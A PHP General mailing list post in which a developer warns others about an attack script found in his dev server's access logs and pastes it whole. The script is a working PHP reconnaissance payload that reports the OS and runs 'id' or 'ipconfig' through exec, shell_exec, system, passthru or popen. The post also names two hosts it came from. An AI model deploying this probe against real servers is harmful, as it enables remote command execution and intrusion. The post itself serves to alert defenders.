I am taking a quick look through the access logs on our dev box, and
came across this little nasty that was trying to execute itself as a XSS
attack(?)
<?
$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a<br>";
echo "<h2>SysOSx:$ker</h2></br>";
echo "<h2>SysOSx:$osx</h2></br>";
if ($osx == "WINNT") { $xeQt="ipconfig -a"; }
else { $xeQt="id"; }
$hitemup=ex($xeQt);
echo $hitemup;
function ex($cfe)
{
$res = '';
if (!empty($cfe))
{
if(function_exists('exec'))
{
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif(function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r")))
{
$res = "";
while([EMAIL PROTECTED]($f)) { $res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
?>
So far, it is coming from http://www.vesprokat.ru/n and
http://www.goodasgold.com
Be aware and check that your files are not vulnerable, although they are only
going to get your
users and groups info, as well as OS, you should all look out for this.
--Paul
All Email originating from UWC is covered by disclaimer
http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
